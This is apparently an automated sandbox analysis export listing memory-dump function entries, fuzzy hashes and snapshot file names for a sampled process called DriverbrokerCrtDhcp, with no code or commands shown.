Instruction ID: c10f70164b6ff1035f19018e7964fd1219b7830057d72b4dfca247c4aa69d5bc
Opcode Fuzzy Hash: a8b3b2b58c113fab53b0eb82a2bf344722080b8dffcae6aba93f896e3dc3bdb6
Instruction Fuzzy Hash: 04313C30A0854E8FEB98DB5684A16BD7BB1FF96300F5000BBD60ED6281DB3F7840AB41

Function 00007FFD34C57F9D Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8f616b69c54b413eac1160a2fd07e3e7d1cd6f6bfab2fa70c1b89b97a54826
Instruction ID: 0ac20ac0c6e8398d75813e3c2ff2e0564bc4cf01e557b8593b1f8946644e9e90
Opcode Fuzzy Hash: 4b8f616b69c54b413eac1160a2fd07e3e7d1cd6f6bfab2fa70c1b89b97a54826
Instruction Fuzzy Hash: CE318471B0890A9FD744DB59C4A24ACF7B1FF4A320B44417AD14ED3642CF28B852DB90

Function 00007FFD34FF25D5 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e669b220dc9398eb6e4db23c6133bd6ff08777fae924428a1b2e54a433041ca
Instruction ID: bc7b8b7cfdcfaffbed92551a8abac5a3c02eb62e980bf95d83dc61531fdb89af
Opcode Fuzzy Hash: 9e669b220dc9398eb6e4db23c6133bd6ff08777fae924428a1b2e54a433041ca
Instruction Fuzzy Hash: 79313E32A0C54ACFDB98DB4484E15BD77A0FF45300F5902B6D50DD6191CA3EA840AB41

Function 00007FFD34FFA245 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d97e23a3386fcee97342aa14dce4a714538cbec507faa0cfc3e0ff7e8a3a06e
Instruction ID: f143f8b002e2f3dfe83e97f8976ca3308db54b08d4f4470f57348ed9b1908f94
Opcode Fuzzy Hash: 4d97e23a3386fcee97342aa14dce4a714538cbec507faa0cfc3e0ff7e8a3a06e
Instruction Fuzzy Hash: 00313932F0890A8FDBA8DB9484A15BD77B0FF46700F5803BAD10ED6191DB3E6940AB41

Function 00007FFD34C51905 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358134f63e1dfbc6f3584955dbb210fce928ce60078a825bebf8fe0a7f4514ac
Instruction ID: 7a8fc74d77ae50cfa647d7f37e21bfa544ea8b3f59861908acb38cc07a83cd94
Opcode Fuzzy Hash: 358134f63e1dfbc6f3584955dbb210fce928ce60078a825bebf8fe0a7f4514ac
Instruction Fuzzy Hash: 7C311630E1C95ACFEB98DB5584A96BDB7A1FF46300F5001BBD20ED6189DE3DA940AB41

Function 00007FFD34FF7678 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15463f4b944466ec9a63358c424b5caf93737e9c857332ea6d693b0c4fd97edc
Instruction ID: 19ff28db2c193dc15a95209feaee55dddc17b95dc8fda2ab4b5fbe8e42eca872
Opcode Fuzzy Hash: 15463f4b944466ec9a63358c424b5caf93737e9c857332ea6d693b0c4fd97edc
Instruction Fuzzy Hash: 7D21F563F1CA8A4FE754A75898A22F8F7E1EF4B310F18027AD14DC6282DE1C68069250

Function 00007FFD34C5EB8E Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8a4115b67e321608390fb72d63e2868bd4e038509efd4a370a94e24247602f
Instruction ID: 206cd3e2f9d2a00f68f03d13821bc96e51e17092109aa95b474b7d3daf714071
Opcode Fuzzy Hash: af8a4115b67e321608390fb72d63e2868bd4e038509efd4a370a94e24247602f
Instruction Fuzzy Hash: EC21E471F0C5494FEB58A75948A22BC77E0FF46311F1401FAD14EC7683DA2CA8069354

Function 00007FFD34FF9132 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623e42b32e433315a8b8c13aaf4e471dafed644f21957fbc954c8f964a5e0404
Instruction ID: 335e916700f87957a6b8f4b796918545d45cbc20161061d3fa61a92ef6781567
Opcode Fuzzy Hash: 623e42b32e433315a8b8c13aaf4e471dafed644f21957fbc954c8f964a5e0404
Instruction Fuzzy Hash: 7531F511A1C5A64BE729C65888B4DB47B51FF4730172C47B6D19ACB48BC82CB881EB41

Function 00007FFD34C59B20 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67adf0fd836c53dfb5d2df25898c6f9e7a3be264fea39970530b0fa577407af
Instruction ID: 282a0efc143958298bbf87bf95f64f76c57b97153c2a8c7e1b8e1226585698b0
Opcode Fuzzy Hash: c67adf0fd836c53dfb5d2df25898c6f9e7a3be264fea39970530b0fa577407af
Instruction Fuzzy Hash: 7731E820A1C5964AF729861548B457CFBA1EF53305F1846FBC58BCB4DBC42CB881EB41

Function 00007FFD34C507F0 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369f36353177fdd5ed1caba3988cdcf2b932eec577c5364a598dca1a76be50e7
Instruction ID: 84425e26cf783511868351b34440b7876b8416527417ea23682461c307114e89
Opcode Fuzzy Hash: 369f36353177fdd5ed1caba3988cdcf2b932eec577c5364a598dca1a76be50e7
Instruction Fuzzy Hash: 6F31FB11A1C5A74BE72A821644F19BC7B91EF5330471D46FBD59ADB487C86CB881E3C1

Function 00007FFD34C60620 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ff91a73f297be14985ab912834ace2fecb5dda09e08e134948376f044f6764
Instruction ID: 556636fdfa2e0f2f7350d7b6185731ef7e5c9f66a21301d0dcd01b897c9b5d85
Opcode Fuzzy Hash: 60ff91a73f297be14985ab912834ace2fecb5dda09e08e134948376f044f6764
Instruction Fuzzy Hash: 63319D10A1C6D64AF329C31548B04B97B90EF93321B1C87BBC58BEB097CA2CB881E741

Function 00007FFD34C563D8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763c47194fc3dfba489f55eec2a229f90ceb97e93ee91e31dbffc8502b91577b
Instruction ID: 9443e725f4ae20e3cd7b7b86e4ca9f0e7773f0b40c7ef49aea2d376a87d22794
Opcode Fuzzy Hash: 763c47194fc3dfba489f55eec2a229f90ceb97e93ee91e31dbffc8502b91577b
Instruction Fuzzy Hash: EE215C35F1C98D8FDB95DB98C8A05ADBBB1FF5A300F1400BAD10EE72A1DE28A8059701

Function 00007FFD34C56F32 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcb3a98971c6d8cbad1238a4b738b8b2b6e49506f2c6d98b3972834ca6577b0
Instruction ID: 67e23847400e63679ada7720d2e7b13ffd013c59e917fd1571991efb3e6f41ed
Opcode Fuzzy Hash: afcb3a98971c6d8cbad1238a4b738b8b2b6e49506f2c6d98b3972834ca6577b0
Instruction Fuzzy Hash: A221D771E0891D9FDF98DB58D4A5AEDB7B1FF69300F1442AED00EE3291CA35A9818B40

Function 00007FFD34FF6532 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886e9f556a31608cbab356fdc62ddac4f7a3b2f59ea6007d802ab87342c2eb45
Instruction ID: 7f43eaf2092c9334755d5bb982370a606d35bcaac98d66b1b576c008e9f91d42
Opcode Fuzzy Hash: 886e9f556a31608cbab356fdc62ddac4f7a3b2f59ea6007d802ab87342c2eb45
Instruction Fuzzy Hash: 5621D971E0891D9FDF98DB58C4A5AEDB7B1FF69300F0401AAD00EE3291CE35A981CB40

Function 00007FFD34C58092 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da758adc2cc6dfe196402f8794cbec1e694c8d775403528b88b28d849057c0d9
Instruction ID: b1d7244de7effc519a779e0603f3268a29201a5870dac3bd0fb592677c4bb1a1
Opcode Fuzzy Hash: da758adc2cc6dfe196402f8794cbec1e694c8d775403528b88b28d849057c0d9
Instruction Fuzzy Hash: C2210472F0DA894FEB58E6A994A62EC77E0EF46350F0001BFC14DC3287CE2C68428351

Function 00007FFD34890CB9 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c8d59224362f0a18560aa1b290a989303af6f161498b29470c705bd4d80c0d
Instruction ID: be9598fb79a199395482eb344ef67ebffd37f196b59efd1ece86f027734a8e0b
Opcode Fuzzy Hash: 84c8d59224362f0a18560aa1b290a989303af6f161498b29470c705bd4d80c0d
Instruction Fuzzy Hash: 3D216551B0DB5606E379562C6CB12757FE1DF87201F1C02BAE5DAC22C3ED1DA80563D0

Function 00007FFD34FFD060 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630be458e0697c9687f2618d89b42cfdf9ceb696f50f59dc613e8af30b1124f4
Instruction ID: 61fad4f89dd616c0386cbb8c44e190c499f82f695bc9b66a2a5054c959d2dd46
Opcode Fuzzy Hash: 630be458e0697c9687f2618d89b42cfdf9ceb696f50f59dc613e8af30b1124f4
Instruction Fuzzy Hash: AE213A20A1C46F9BE6788794D0706B87752FF51700B2487BAD14B8B0CBC82DB882B751

Function 00007FFD34FF14F0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e48aea08ae0f215e70dbc8aaeef1ab57ac5f3f115ff5ea4815aecd578c91b78
Instruction ID: 1c2888ccebaae6c05e7cb480a568f83e28485e10980b27de97df4ae6f90f9e57
Opcode Fuzzy Hash: 7e48aea08ae0f215e70dbc8aaeef1ab57ac5f3f115ff5ea4815aecd578c91b78
Instruction Fuzzy Hash: 2221D611E6C46A4FE778931445B44B47761FF92301B1C87BAD14BCB49FCA2CBC81A781

Function 00007FFD34FF59E8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a921676d6d489ded52c3bda5e5def85af5ed8ba651c893795452476ae4c9f2
Instruction ID: c10ad297646e7d59976efb11980fa5d39c3e5caf5972dcdc95af0c74631f0e3b
Opcode Fuzzy Hash: c2a921676d6d489ded52c3bda5e5def85af5ed8ba651c893795452476ae4c9f2
Instruction Fuzzy Hash: 0A219F32E1894D8FDB98DB98C8A05FCB7B1FF59300F14117AD10AE3292DE3968019B41

Function 00007FFD34C5DA69 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c542a66e9be389e1bf19088b5be688b3caf82033840cfc5d3020b137634dab38
Instruction ID: 10c44d1517279d353b12b5209854d92586ec7e07cac3ab423ea3b41697c1332a
Opcode Fuzzy Hash: c542a66e9be389e1bf19088b5be688b3caf82033840cfc5d3020b137634dab38
Instruction Fuzzy Hash: BC210971E196099FDB98DB58C4B6AADB7B1FF59311F0081BED10EE7291CE38A9418B40

Function 00007FFD34FF4D88 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a2b4cb0b171b28dd06d067e83aa608e7c6f0554a4e5fc4ed2805d217e71652
Instruction ID: 3afc9eddcc1605fbd74e2f9d8ab89d7cd393c0aa83c3e903b7e8fbd1b84d3ad8
Opcode Fuzzy Hash: 68a2b4cb0b171b28dd06d067e83aa608e7c6f0554a4e5fc4ed2805d217e71652
Instruction Fuzzy Hash: 16217511A5C4665BE778C64884F4DB47391FF96301B2C4776D55BCB58AC83CB9C1EE80

Function 00007FFD34FF14EB Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d01bcddde251cfb0d21c98554438744f4be0b6a06335927b631e6110cd088a
Instruction ID: f88b3066bddaf8531c377fddccb84ed229cfc1e7c57b0b3b9a93190a3564328b
Opcode Fuzzy Hash: 00d01bcddde251cfb0d21c98554438744f4be0b6a06335927b631e6110cd088a
Instruction Fuzzy Hash: 0821C611E2C46A4BF678960885F05B47791FF92301B1C47B9D24BCB58ECA2CFC81A781

Function 00007FFD34C59B50 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68288804dcdcc499fb925400d3ea5505f1812f7dd8e2708eab77fa057a48681
Instruction ID: 56e7c6f0151a0ca02dbf4013a06ad653bbbd4dad6a19cc17a2eecac983f97501
Opcode Fuzzy Hash: e68288804dcdcc499fb925400d3ea5505f1812f7dd8e2708eab77fa057a48681
Instruction Fuzzy Hash: C111DA20B2C4664AF678960984F45BCF7E1EF52305F1446F7D59BCB5CAC82CB881AB80

Function 00007FFD34C50820 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6958679b56a978da7f296440b2c6def2b17dd111cdfedda95ed3f7bd393eb4
Instruction ID: eb1f12172984c92120f4e4860d26d6cb553341c3abbeb4eeb77be9d9f6bb18ac
Opcode Fuzzy Hash: 1d6958679b56a978da7f296440b2c6def2b17dd111cdfedda95ed3f7bd393eb4
Instruction Fuzzy Hash: 2111BB11A1C46B4AEA2CD60744F09BC7251FF92305B1946F7D15BD748AC83CF881E7C0

Function 00007FFD34891575 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc6efbdedf29b1d35752a75c40f299b6485424312bc3b94fd964e833534a1c5
Instruction ID: 82a6d71b7c5a76e3f338251d61baf37a2944f7ef6cb195766f05363ea8bed638
Opcode Fuzzy Hash: ccc6efbdedf29b1d35752a75c40f299b6485424312bc3b94fd964e833534a1c5
Instruction Fuzzy Hash: C721A135B0C6898FE702EBB888A51DDBFB0EF82311F1545B7C254C7182EA3856599751

Function 00007FFD34890870 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0716408e61076159a84314862cd6681fb33e705cfd7ebd8c425d897aae2561ea
Instruction ID: 09d47c53ce566c8dddcaeeef13a7734bb4501ac8b8772ff3643ed75c31a3e707
Opcode Fuzzy Hash: 0716408e61076159a84314862cd6681fb33e705cfd7ebd8c425d897aae2561ea
Instruction Fuzzy Hash: F6112B3291D7884FD761AB3888591EA7FF0FF4B219F10017FE5DAD3192DA3898059792

Function 00007FFD34FF0570 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e566597d1fe9f8391e6ebee256062e9b547142dfad1f7f3958440f4eea098881
Instruction ID: 55a236cfe52b22e73bdd9afeaeae3c36a4cd8d4b87cb0e2899e3ff8ae6030e4c
Opcode Fuzzy Hash: e566597d1fe9f8391e6ebee256062e9b547142dfad1f7f3958440f4eea098881
Instruction Fuzzy Hash: 6311E331B0990A4FDBA4EB6494A15FA73A5FF46310B04063BD50EC3582CE3CB40593A0

Function 00007FFD34FF81E0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58131ad381f01e9ed2bc0d1202383e458ae1f57105b5a5b81a5281f41195937
Instruction ID: bb15432e1eb186433f5df46e73078a0517d11942119ff8f9f212b1ac2bb24f24
Opcode Fuzzy Hash: e58131ad381f01e9ed2bc0d1202383e458ae1f57105b5a5b81a5281f41195937
Instruction Fuzzy Hash: 1911E332B08D099FEB65EBA4A4A15FA73A4EF56310B04073AD50EC35C2CF3CB40592A0

Function 00007FFD34C5F6D0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99002af749d0fc1d9d15ce80b42fac54babfd4aeb585042a902eb5ccab0f4565
Instruction ID: bee6cf291675aaef4aad64467439be3c0531572590604a32dbc0065228a8da85
Opcode Fuzzy Hash: 99002af749d0fc1d9d15ce80b42fac54babfd4aeb585042a902eb5ccab0f4565
Instruction Fuzzy Hash: 1311E731B189094FDB68EB6594A15FE73E0EF56351B40057BD54EC35C2CE3CB8099390

Function 00007FFD34C58BD0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08fd06ce511b5b38b7223b1639ecbed02915f68029361c9bab78cc31c3cd52ee
Instruction ID: da7a2a68125109dae6c38addd248c4685192da9ff84e646e1988f8044c29d043
Opcode Fuzzy Hash: 08fd06ce511b5b38b7223b1639ecbed02915f68029361c9bab78cc31c3cd52ee
Instruction Fuzzy Hash: C511C130B19A098FDB64AA6594A15FE73B1FF56351F00067BD54EC3582CE2CB40992A0

Function 00007FFD34C5C5D8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086b38e5bf7d09ba51295f493b9b27c318a54f06038b288c29b4c883cfa0747c
Instruction ID: e98afdaa4e0fc97f10b6d8f80bf2c5bc588690a4b730a4ef1587c2758467c4c9
Opcode Fuzzy Hash: 086b38e5bf7d09ba51295f493b9b27c318a54f06038b288c29b4c883cfa0747c
Instruction Fuzzy Hash: E4014431F086095BE7A4926944A86BD3AE2DF8B341F0400B7E10EE3291DF5C7C069394

Function 00007FFD34FF805E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6dd1bbf73a1abcc35f9ac0d8738cf597e4d4cfdb5e67aebed5b4ffe6702f34
Instruction ID: d2ea3ec42b3ccf2a05bf6845ccddb82acb0f1a9c35de21e0ba362991cbd0a002
Opcode Fuzzy Hash: dc6dd1bbf73a1abcc35f9ac0d8738cf597e4d4cfdb5e67aebed5b4ffe6702f34
Instruction Fuzzy Hash: C71108323099068FEB199E54D4A16E533A4EF56351F14033ADA0DC76C1CB3DA5508750

Function 00007FFD34C5F54E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b15b5399f78ea44ba2f098df72b99750ed763b150d91dbff38315e06a4364a
Instruction ID: e57d17d164bcbcc39741ed9543e8c06323add30820aa327af1f6bfa54c3a9436
Opcode Fuzzy Hash: f8b15b5399f78ea44ba2f098df72b99750ed763b150d91dbff38315e06a4364a
Instruction Fuzzy Hash: BE11663130950A8FEB289E08D4A16ED33A4EF56361F10017BEA0DC72D1CF3DA8408750

Function 00007FFD34C58A4E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c18cc8e071fda45d7bb7231ac9b764a93cb52198dbe5ab21e25e4d69d36d907
Instruction ID: 27a4017c14dfefcb8faa30ef48cb3cb17205a8e93c44cc4a2ed46cd270952386
Opcode Fuzzy Hash: 1c18cc8e071fda45d7bb7231ac9b764a93cb52198dbe5ab21e25e4d69d36d907
Instruction Fuzzy Hash: 5111043130950A8FEB299E18D8A16ED33A4FF57361F1001BBEA0DC76C1CF2DA8658760

Function 00007FFD34C5DA8E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be449c60de8b24269de54b9618c430c59309d9c3f956be69b72d19b461c6cf3
Instruction ID: 860f2ddaeb357c03d6d1036312ddc6e1287a2bd3d8511a7f78767ea8a4bfec35
Opcode Fuzzy Hash: 0be449c60de8b24269de54b9618c430c59309d9c3f956be69b72d19b461c6cf3
Instruction Fuzzy Hash: D211F630A1891D8BDB98DB58C4B5ABDB7B1FF59311F4441BED10EE3691CE39A9808B40

Function 00007FFD34891DDD Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
